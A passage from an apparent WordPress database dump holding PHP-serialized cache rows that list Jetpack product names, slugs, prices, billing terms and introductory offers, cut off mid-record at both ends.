Social\";s:12:\"product_slug\";s:29:\"a4a_jetpack_social_v1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_social_v1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"a4a_jetpack_creator_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3340;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:26:\"a4a_jetpack_creator_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_creator_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:27:\"a4a_jetpack_creator_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3341;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:27:\"a4a_jetpack_creator_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_creator_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}}'),(848,43,'default_password_nag',''),(849,43,'elementor_admin_notices','a:1:{s:20:\"experiment_promotion\";s:4:\"true\";}'),(850,43,'my-jetpack-cache-date','1771856924'),(851,43,'my-jetpack-cache','O:8:\"stdClass\":118:{s:15:\"jetpack_premium\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2000;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:15:\"jetpack_premium\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$164.95\";s:21:\"combined_cost_display\";s:7:\"$164.95\";s:4:\"cost\";d:164.94999999999998863131622783839702606201171875;s:18:\"cost_smallest_unit\";i:16495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$13.75\";}s:16:\"jetpack_business\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2001;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:16:\"jetpack_business\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$399.95\";s:21:\"combined_cost_display\";s:7:\"$399.95\";s:4:\"cost\";d:399.94999999999998863131622783839702606201171875;s:18:\"cost_smallest_unit\";i:39995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$33.33\";}s:12:\"jetpack_free\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2002;s:12:\"product_name\";s:12:\"Jetpack Free\";s:12:\"product_slug\";s:12:\"jetpack_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_premium_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2003;s:12:\"product_name\";s:15:\"Jetpack Premium\";s:12:\"product_slug\";s:23:\"jetpack_premium_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-premium\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_business_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2004;s:12:\"product_name\";s:20:\"Jetpack Professional\";s:12:\"product_slug\";s:24:\"jetpack_business_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-business\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$39.95\";s:21:\"combined_cost_display\";s:6:\"$39.95\";s:4:\"cost\";d:39.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:3995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_personal\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2005;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:16:\"jetpack_personal\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$77.95\";s:21:\"combined_cost_display\";s:6:\"$77.95\";s:4:\"cost\";d:77.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7795;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$6.50\";}s:24:\"jetpack_personal_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2006;s:12:\"product_name\";s:16:\"Jetpack Personal\";s:12:\"product_slug\";s:24:\"jetpack_personal_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-personal\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$6.95\";s:21:\"combined_cost_display\";s:5:\"$6.95\";s:4:\"cost\";d:6.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:695;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_security_daily\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2010;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:22:\"jetpack_security_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.00\";s:21:\"combined_cost_display\";s:4:\"$299\";s:4:\"cost\";i:299;s:18:\"cost_smallest_unit\";i:29900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:149;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$24.92\";}s:30:\"jetpack_security_daily_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2011;s:12:\"product_name\";s:22:\"Jetpack Security Daily\";s:12:\"product_slug\";s:30:\"jetpack_security_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:22:\"jetpack-security-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$24.95\";s:21:\"combined_cost_display\";s:6:\"$24.95\";s:4:\"cost\";d:24.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_security_realtime\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2012;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:25:\"jetpack_security_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$839.00\";s:21:\"combined_cost_display\";s:4:\"$839\";s:4:\"cost\";i:839;s:18:\"cost_smallest_unit\";i:83900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:419;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$69.92\";}s:33:\"jetpack_security_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2013;s:12:\"product_name\";s:26:\"Jetpack Security Real-time\";s:12:\"product_slug\";s:33:\"jetpack_security_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$69.95\";s:21:\"combined_cost_display\";s:6:\"$69.95\";s:4:\"cost\";d:69.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:6995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_complete\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2014;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:16:\"jetpack_complete\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.40\";s:21:\"combined_cost_display\";s:7:\"$599.40\";s:4:\"cost\";d:599.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:59940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:299.3999999999999772626324556767940521240234375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$49.95\";}s:24:\"jetpack_complete_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2015;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:24:\"jetpack_complete_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2016;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";O:8:\"stdClass\":2:{s:6:\"errors\";O:8:\"stdClass\":1:{s:45:\"introductory-offer-removed-subscription-found\";a:1:{i:0;s:141:\"Unable to apply introductory offer to Jetpack Security (10GB) because a subscription for this product has already been purchased in the past.\";}}s:10:\"error_data\";a:0:{}}}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:27:\"jetpack_security_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2017;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t2_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2019;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$899.40\";s:21:\"combined_cost_display\";s:7:\"$899.40\";s:4:\"cost\";d:899.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:89940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:359.3999999999999772626324556767940521240234375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$74.95\";}s:27:\"jetpack_security_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2020;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_growth_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2021;s:12:\"product_name\";s:14:\"Jetpack Growth\";s:12:\"product_slug\";s:22:\"jetpack_growth_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-growth\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_growth_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2022;s:12:\"product_name\";s:14:\"Jetpack Growth\";s:12:\"product_slug\";s:21:\"jetpack_growth_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-growth\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:24:\"jetpack_growth_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2023;s:12:\"product_name\";s:14:\"Jetpack Growth\";s:12:\"product_slug\";s:24:\"jetpack_growth_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-growth\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:22:\"jetpack_starter_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2030;s:12:\"product_name\";s:15:\"Jetpack Starter\";s:12:\"product_slug\";s:22:\"jetpack_starter_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:15:\"jetpack-starter\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$71.40\";s:21:\"combined_cost_display\";s:6:\"$71.40\";s:4:\"cost\";d:71.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:7140;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:47.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$5.95\";}s:23:\"jetpack_starter_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2031;s:12:\"product_name\";s:15:\"Jetpack Starter\";s:12:\"product_slug\";s:23:\"jetpack_starter_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:15:\"jetpack-starter\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.95\";s:21:\"combined_cost_display\";s:5:\"$8.95\";s:4:\"cost\";d:8.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:895;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"jetpack_security_t1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2034;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:29:\"jetpack_security_t1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:26:\"jetpack_complete_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2035;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:26:\"jetpack_complete_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$959.04\";s:21:\"combined_cost_display\";s:7:\"$959.04\";s:4:\"cost\";d:959.0399999999999636202119290828704833984375;s:18:\"cost_smallest_unit\";i:95904;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:719.0399999999999636202119290828704833984375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$39.96\";}s:23:\"jetpack_boost_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2036;s:12:\"product_name\";s:13:\"Jetpack 